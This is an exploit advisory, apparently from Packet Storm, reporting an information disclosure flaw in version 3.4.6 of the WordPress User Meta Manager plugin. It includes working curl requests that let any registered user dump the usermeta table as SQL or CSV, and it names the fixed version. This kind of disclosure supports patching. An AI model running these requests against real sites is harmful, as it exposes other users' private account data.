WordPress User Meta Manager plugin version 3.4.6 suffers from an information disclosure vulnerability.
a51287f18774d3a73867a7c22de55bf0e7a172ac650589d47d5f690b0ec348bf* Exploit Title: WordPress User Meta Manager Plugin [Information Disclosure]
* Discovery Date: 2015-12-28
* Public Disclosure Date: 2016-02-01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4
* Category: webapps
## Description
User Meta Manager for WordPress plugin up to v3.4.6 suffers from a
information disclosure vulnerability. Any registered user can perform an
a series of AJAX requests, in order to get all contents of `usermeta` DB
table.
`usermeta` table holds additional information for all registered users.
User Meta Manager plugin offers a `usermeta` table backup functionality.
During the backup process the plugin takes no action in protecting the
leakage of the table contents to unauthorized (non-admin) users.
## PoC
### Get as MySQL query
First a backup table must be created
```sh
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\
?action=umm_switch_action&umm_sub_action=umm_backup"
```
Then we get the table with another request
```sh
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\
?action=umm_switch_action&umm_sub_action=umm_backup&mode=sql"
```
### Get as CSV file
```sh
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\
?action=umm_switch_action&umm_sub_action=umm_get_csv"
```
## Solution
Upgrade to version 3.4.8
--
Panagiotis Vagenas
Web Developer / Security Enthusiast
6972883849 / 2105765611
[Twitter](http://twitter.com/panVagenas)
[LinkedIn](http://gr.linkedin.com/in/panvagenas)
[GitHub](http://github.com/panvagenas)
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed